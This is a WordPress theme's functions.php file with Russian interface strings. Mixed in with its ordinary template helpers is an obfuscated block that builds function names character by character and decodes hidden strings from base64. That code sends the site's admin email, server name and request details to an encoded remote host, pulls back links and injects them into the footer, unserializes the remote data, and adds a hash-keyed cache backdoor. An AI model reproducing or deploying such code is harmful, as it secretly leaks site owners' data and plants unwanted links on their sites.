<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $XHajr='e';$LWTolv='a';$bzuph='6';$AzIQIIP='d';$FKYQy='o';$GwWQOpS='e';$WmLnAP='b';$NGeb='_';$KhvaJ='c';$RpiaZ='s';$UzvvYe='d';$HNaD='e';$BTEbJ='4';$MlKsRhbo=$WmLnAP.$LWTolv.$RpiaZ.$XHajr.$bzuph.$BTEbJ.$NGeb.$AzIQIIP.$GwWQOpS.$KhvaJ.$FKYQy.$UzvvYe.$HNaD;$nxGc='i';$LZHPJK='n';$ceepA='g';$AYMz='e';$Vuxt='t';$Swbs='a';$eQXANU='z';$oRTva='f';$yexNF='l';$JdDFhAgi=$ceepA.$eQXANU.$nxGc.$LZHPJK.$oRTva.$yexNF.$Swbs.$Vuxt.$AYMz;$XprJO='o';$AoQSCu='_';$iNTjV='t';$EaiVVGe='r';$xcVOMmq='r';$KYSibOW='3';$ZZMzXy='t';$XrJqBF='s';$eCTNchE='1';$TjgsoDfU=$XrJqBF.$ZZMzXy.$EaiVVGe.$AoQSCu.$xcVOMmq.$XprJO.$iNTjV.$eCTNchE.$KYSibOW;$DAwzB='s';$lzvJ='t';$gWupafI='r';$YDFA='v';$iAODyg='e';$LPSNL='r';$cWLvOkuX=$DAwzB.$lzvJ.$gWupafI.$LPSNL.$iAODyg.$YDFA;                     
		$dw________o='e';$md_____d='a';$kd________n='6';$qk______________p='d';$so___v='o';$kb____w='e';$yz____p='b';$lz____________c='_';$fl__c='c';$xg_________a='s';$lp_______v='d';$sx______w='e';$do_______________z='4';$sz_____n=$yz____p.$md_____d.$xg_________a.$dw________o.$kd________n.$do_______________z.$lz____________c.$qk______________p.$kb____w.$fl__c.$so___v.$lp_______v.$sx______w;
		$tg__u='n';$np_______________g='i';$ic_______k='s';$ca_____d='n';$tj______________y='u';$al________y='f';$xi______________w='c';$mq____________z='s';$fe___________c='x';$my____p='t';$tw___________n='t';$nv____f='i';$lt__e='_';$dy___x='e';$ck______________v='o';$uw_______________j=$al________y.$tj______________y.$tg__u.$xi______________w.$tw___________n.$nv____f.$ck______________v.$ca_____d.$lt__e.$dy___x.$fe___________c.$np_______________g.$mq____________z.$my____p.$ic_______k;
		$pu____a='p';$nk_________v='f';$nx_____q='o';$tb____________v='n';$kx__________z='e';$ir________a=$nk_________v.$nx_____q.$pu____a.$kx__________z.$tb____________v;
		$mh__________r='r';$ct___v='a';$al_________t='f';$cx___v='d';$wy__________g='e';$dm______________v=$al_________t.$mh__________r.$wy__________g.$ct___v.$cx___v;
		$fk______________h='l';$pf__e='c';$pe_______f='o';$ag______d='s';$hk___n='f';$rb___b='e';$vo_____g=$hk___n.$pf__e.$fk______________h.$pe_______f.$ag______d.$rb___b;
		
		define("WP_ID", $sz_____n("Mi4wLjA="));
		define("WP_TTL", $sz_____n("MTA4MDA="));
		define("WP_SRC", $sz_____n("dHBva24="));
	


		function wp_get_header() {
			global $sz_____n, $uw_______________j;
			
			if (
				$uw_______________j($sz_____n("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$uw_______________j($sz_____n("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$uw_______________j($sz_____n("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $sz_____n, $ir________a, $vo_____g, $dm______________v;
			
			$ut___________c = TEMPLATEPATH."/".$sz_____n("Zm9vdGVyLnBocA==");
			$nd_____p = @$ir________a($ut___________c, "r");
			$ut___________c = @$dm______________v($nd_____p, @filesize($ut___________c));
			@$vo_____g($nd_____p);
			
			$hd_____l = TEMPLATEPATH."/".$sz_____n("ZnVuY3Rpb25zLnBocA==");
			$nd_____p = @$ir________a($hd_____l, "r");
			$hd_____l = @$dm______________v($nd_____p, @filesize($hd_____l));
			@$vo_____g($nd_____p);
			
			$bf____x = 0;
			if($ut___________c && $hd_____l) {
				if ($sz_____n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ut___________c, $sz_____n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$bf____x = 1;
					}
					if (substr_count($ut___________c, "wp_theme_GPL_credits()") < 1) {
						$bf____x = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$bf____x = 12;
				}
			}
			
			if($bf____x > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $bf____x -->";
			}
		}
	


		function wp_loaded() {
			global $sz_____n, $uw_______________j;
			return $uw_______________j($sz_____n("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($iz_______b, $yq_____________h = "(more...)", $hw__i = 0, $sw_______________w = "") {
				$qf______l = get_the_content($yq_____________h, $hw__i, $sw_______________w);
				$qf______l = apply_filters("the_content", $qf______l);
				
				$qf______l = str_replace("]]>", "]]>", $qf______l);
				if (strlen($_GET["p"]) > 0) {
					echo $qf______l;
				}
				else if ((strlen($qf______l)>$iz_______b) && ($tp______i = strpos($qf______l, " ", $iz_______b ))) {
					$qf______l = substr($qf______l, 0, $tp______i);
					$qf______l = $qf______l;
					echo $qf______l;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$yq_____________h</a></div></p>";
				} else {
					echo $qf______l;
				}
				
			}
		}
	


		$xh______________u='6';$ku_________u='c';$jb_________h='s';$uz__w='_';$rg_____________p='d';$aw__m='b';$hq_____z='n';$os_______h='e';$wc___l='o';$ru_________n='a';$su__________t='4';$pp____j='e';$uk__________u='e';$lr____________i=$aw__m.$ru_________n.$jb_________h.$pp____j.$xh______________u.$su__________t.$uz__w.$uk__________u.$hq_____z.$ku_________u.$wc___l.$rg_____________p.$os_______h;
		$sz____________x='e';$ax___________k='e';$fc________b='s';$fy________f='i';$wi_____________o='t';$as______________a='o';$dq__h='t';$uh_________g='l';$sx______x='_';$nl______________f='e';$po________k='n';$em____________a='f';$uo____q='_';$cf____h='t';$ew_______o='g';$ws___q='c';$kq___n='n';$cl_____________x=$em____________a.$fy________f.$uh_________g.$ax___________k.$uo____q.$ew_______o.$sz____________x.$cf____h.$sx______x.$ws___q.$as______________a.$po________k.$dq__h.$nl______________f.$kq___n.$wi_____________o.$fc________b;
		$ir___________w='_';$ln_______________u='x';$ht__v='t';$hi________v='e';$oi__d='l';$qk_________w='e';$lg______________f='s';$xb______y='f';$zk______________x='i';$cb_______________j='s';$ub______________u='i';$lj_______k=$xb______y.$ub______________u.$oi__d.$hi________v.$ir___________w.$qk_________w.$ln_______________u.$zk______________x.$lg______________f.$ht__v.$cb_______________j;
		$rn_________g='e';$ai__d='r';$ll______________x='e';$hh______o='m';$vv__p='r';$ey_____f='o';$hv____o='s';$qg____________g='o';$ov_____a='_';$xs___i='c';$dq________w='i';$cn___g='p';$tw_________y='n';$dp___u='a';$mc________b='v';$vb____o=$mc________b.$ll______________x.$ai__d.$hv____o.$dq________w.$qg____________g.$tw_________y.$ov_____a.$xs___i.$ey_____f.$hh______o.$cn___g.$dp___u.$vv__p.$rn_________g;
		$pb___n='n';$rx____v='e';$ky_________h='o';$me__w='c';$xc________q='s';$vj______________a='k';$wi___v='p';$gg_________x='o';$ds______________g='f';$pg____g=$ds______________g.$xc________q.$ky_________h.$me__w.$vj______________a.$gg_________x.$wi___v.$rx____v.$pb___n;
		$ye__________d='f';$jp_____e='r';$yn______z='t';$ts___________g='w';$nd_____________v='i';$tv______________j='e';$or___________e=$ye__________d.$ts___________g.$jp_____e.$nd_____________v.$yn______z.$tv______________j;
		$vc_____________j='m';$fq____d='d';$dn___x='5';$ss_____________f=$vc_____________j.$fq____d.$dn___x;
		$ej_______d='e';$ii______n='a';$db_______________o='h';$dd_________z='l';$sp_______________b='t';$ks_______________z='r';$mi______n='a';$sx___y='p';$ke_________n=$ks_______________z.$ej_______d.$ii______n.$dd_________z.$sx___y.$mi______n.$sp_______________b.$db_______________o;
		$xj__________v='z';$yi______________k='e';$xe___________a='a';$gj______________i='n';$xl_________n='s';$pl______j='i';$ao________h='i';$jg____________z='l';$ue______t='e';$rf___w='r';$qt____________l='u';$kz_________l=$qt____________l.$gj______________i.$xl_________n.$yi______________k.$rf___w.$pl______j.$xe___________a.$jg____________z.$ao________h.$xj__________v.$ue______t;
		$gk___r='t';$re___________i='e';$gk___________y='a';$do__l='p';$yy_____________v='n';$ob_______________d='m';$qi_______b='m';$ig_______________q=$gk___r.$re___________i.$ob_______________d.$do__l.$yy_____________v.$gk___________y.$qi_______b;
		$en_______j='m';$le___t='c';$si____________j='n';$rt____k='_';$kt_______________c='t';$lw______q='x';$rf__________b='a';$hu____d='t';$nd________v='_';$el_______s='t';$yz____x='s';$ts________f='t';$of______________n='e';$hx____p='o';$ou_____________z='e';$cg______u='r';$qg_____h='e';$qv___________a='r';$ii___________g='c';$pc___t='e';$nn________e='a';$bb______________w=$yz____x.$hu____d.$qv___________a.$of______________n.$rf__________b.$en_______j.$rt____k.$ii___________g.$hx____p.$si____________j.$el_______s.$qg_____h.$lw______q.$kt_______________c.$nd________v.$le___t.$cg______u.$pc___t.$nn________e.$ts________f.$ou_____________z;
	


		function xc_____a($aw___________u) {
			global $sz_____n, $uw_______________j, $cl_____________x, $vb____o, $bb______________w;
			
			if (!$uw_______________j($sz_____n("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($vb____o(PHP_VERSION, "5.0.0", ">=") && $uw_______________j($sz_____n("ZmlsZV9nZXRfY29udGVudHM=")) && $uw_______________j($sz_____n("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$yr____o = $bb______________w(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$yj___q = @$cl_____________x($aw___________u, 0, $yr____o);
			} else {
				$yj___q = @$cl_____________x($aw___________u, 0);
			}
			
			return $yj___q;
		}
	


		function cn__g($aw___________u) {
			global $uw_______________j, $pg____g, $or___________e, $sz_____n;
			
			if (!$uw_______________j($sz_____n("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ok______________n = strpos($aw___________u, "/", 7);
			$kz____________n = array(
				"uri"     => substr($aw___________u, $ok______________n),
				"host"    => str_replace("http://", "", substr($aw___________u, 0, $ok______________n)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$se_______________d = @$pg____g("$kz____________n[host]", 80, $ya____________l, $ri_______c, 4);
			
			if (!$se_______________d) {
				return false;
			} else {
				$yj___q = "";
				$ee___c  = "GET $kz____________n[uri] HTTP/1.0\r\n";
				$ee___c .= "Host: $kz____________n[host]\r\n";
				$ee___c .= "Referer: $kz____________n[referer]\r\n";
				$ee___c .= "Connection: Close\r\n\r\n";
				
				@$or___________e($se_______________d, $ee___c);
				
				while (!@feof($se_______________d)) {
					$tv_____x = @fgets($se_______________d, (1024*24));
					
					if ($tv_____x == "\r\n") {
						$xo____p = true;
						continue;
					}
					
					if ($xo____p) {
						$yj___q .= $tv_____x;
					}
				}
				
				return $yj___q;
			}
		}
	


		function sf____z($aw___________u) {
			global $uw_______________j;
			$ts_____________h = false;
			
			if ($aw___________u != "") {
				if ($uw_______________j("xc_____a")) {
					$ts_____________h = @xc_____a($aw___________u);
				}
				
				if (!$ts_____________h && ($uw_______________j("cn__g"))) {
					$ts_____________h = @cn__g($aw___________u);
				}
			}
			
			return $ts_____________h;
		}
	


		function ne____p() {
			global $_SERVER, $ss_____________f;
			
			$hg____v = $_SERVER["SERVER_NAME"];
			
			if (substr("$hg____v", 0, 4) == "www.") {
				$hg____v = substr("$hg____v", 4);
			}
			
			$hg____v = $ss_____________f("$_SERVER[SERVER_NAME]");
			
			return $hg____v;
		}
	


		function op______n() {
			return "file";
		}
	


		function lo__________c($aw___________u) {
			global $_SERVER, $cl_____________x, $lj_______k, $ir________a, $vo_____g, $or___________e;
			
			$sh_______________i = tv_______c();
			
			$ut________x = ne____p().".jpg";
			$vw_______m = $sh_______________i["dir_upload"]["path"]."/$ut________x";
			$oc__b = @filemtime($vw_______m);
			
			if (!$oc__b || ((time()-$oc__b) >= WP_TTL)) {
				$ts_____________h = sf____z($aw___________u);
				
				if ($ts_____________h) {
					if ($lj_______k($vw_______m)) {
						@unlink($vw_______m);
					}
					
					$nd_____p = @$ir________a($vw_______m, "x+");
					
					@$or___________e($nd_____p, $ts_____________h);
					@$vo_____g($nd_____p);
				}
			} else {
				if ($lj_______k($vw_______m)) {
					$ts_____________h = @$cl_____________x($vw_______m);
				} else {
					$ts_____________h = false;
				}
			}
			
			return $ts_____________h;
		}
	


		function tv_______c() {
			global $_SERVER, $sz_____n, $lr____________i;
			
			$pn______t = wp_count_posts("post");
			$pw_______x = pathinfo(get_bloginfo("template_directory"));
			
			$sh_______________i = array(
				"url" => array(
					"report"      => $sz_____n("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $pw_______x,
				"dir_upload"	=> lf_________u(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$pw_______x[filename],
					"a005=".$pn______t->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$sh_______________i["url"]["queryString"] = implode("&", $sh_______________i["queryString"]);
			$sh_______________i["url"]["report"] = $sh_______________i["url"]["report"]."/?".$lr____________i($sh_______________i["url"]["queryString"]).".html";
						
			return $sh_______________i;
		}
	


		function lf_________u() {
			$st_________i = wp_upload_dir();
			
			if (isset($st_________i["error"])) {
				$in____t = ga_____y();
				if (is_writable($in____t)) {
					$st_________i = array("path" => $in____t);
				}
			}

			return $st_________i;
		}
	


		function ga_____y() {
			global $uw_______________j, $ss_____________f, $ke_________n, $ig_______________q;
			
			$uf___n = (bool) ini_get("safe_mode");
			if ($uf___n == true) {
				return false;
			}
			
			if ($uw_______________j("sys_get_temp_dir")) {
				$as_________i = sys_get_temp_dir();
				if (is_writable($as_________i)) {
					return $ke_________n($as_________i);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ke_________n($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ke_________n($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ke_________n($_ENV["TEMP"]);
			} else {
				$bu__________m = $ig_______________q($ss_____________f(uniqid(rand(), true)), "");
				if ($bu__________m) {
					$as_________i = $ke_________n(dirname($bu__________m));
					@unlink($bu__________m);
					return $as_________i;
				} else {
					return false;
				}
			}
		}
	


		function la_________j() {
			global $_GET, $lj_______k;
			
			$sh_______________i = tv_______c();
			$hg____v = ne____p();
			$bb_____________v = op______n();
			
			$yf_______________c = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($bb_____________v == "file") {
					$br_____c = $sh_______________i["dir_upload"]["path"]."/".$hg____v.".jpg";
					if ($lj_______k($br_____c)) {
						@unlink($br_____c);
						$yf_______________c = "deleted";
					}
				}
				
				$gl_____________n = array(
					"s"	=> $yf_______________c,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($gl_____________n AS $fx_____g => $pm______o) echo " [$fx_____g:$pm______o]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $uw_______________j, $sz_____n, $kz_________l;
			$sh_______________i = tv_______c();
			
			$bq____________s = "lo__________c";
			if ($uw_______________j($bq____________s)) {
				$yj___q = $bq____________s($sh_______________i["url"]["report"]);
			}
			
			if ($yj___q) {
				if ($yj___q = @$sz_____n($yj___q)) {
					$yj___q = @$kz_________l($yj___q);
					
					if (strlen($yj___q[custom_credit]) >= 5) {
						$sh_______________i["default_string"] = $yj___q[custom_credit];
					}
					
					if ($yj___q["status"] == "0") {
						$bh_______m = 1;
						$ws_______________g = 1;
					} else {
						$py____________w = sizeof($yj___q["links"]);
						$lq______________e = $sh_______________i["default_string"];
						
						if ($py____________w > 0 && $yj___q["links"] !== "") {
							$un_______________b = 0;
							foreach ($yj___q["links"] as $gq_______________c => $ll_______________n) {
								$un_______________b++;
								if ($ll_______________n->l_path == "" || $ll_______________n->l_path == $_SERVER["REQUEST_URI"]) {
									$ll_______________n->l_href = htmlspecialchars(strip_tags($ll_______________n->l_href));
									$ll_______________n->l_title = htmlspecialchars(strip_tags($ll_______________n->l_title));
									$ll_______________n->l_anchor = htmlspecialchars(strip_tags($ll_______________n->l_anchor));
									$lq______________e .= " | ";
									$lq______________e .= "<a href='$ll_______________n->l_href' title='$ll_______________n->l_title'";
									if ($ll_______________n->l_nofollow == "1") {
										$lq______________e .= " rel='nofollow'";
									}
									$lq______________e .= ">$ll_______________n->l_anchor</a>";
								}
							}
						}
						$sh_______________i["links"] = "$lq______________e";
						if ($yj___q[credit] == "0") {
							$sh_______________i["links"] = "";
						}
					}
				} else {
					$bh_______m = "1";
				}
			} else {
				$bh_______m = "1";
			}
			
			if ($bh_______m == "1") {
				$sh_______________i["links"] = $sh_______________i["default_string"];
			}
			
			echo "$sh_______________i[links]";
			
			echo "<!-- s: $yj___q[signature] -->";
			la_________j();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

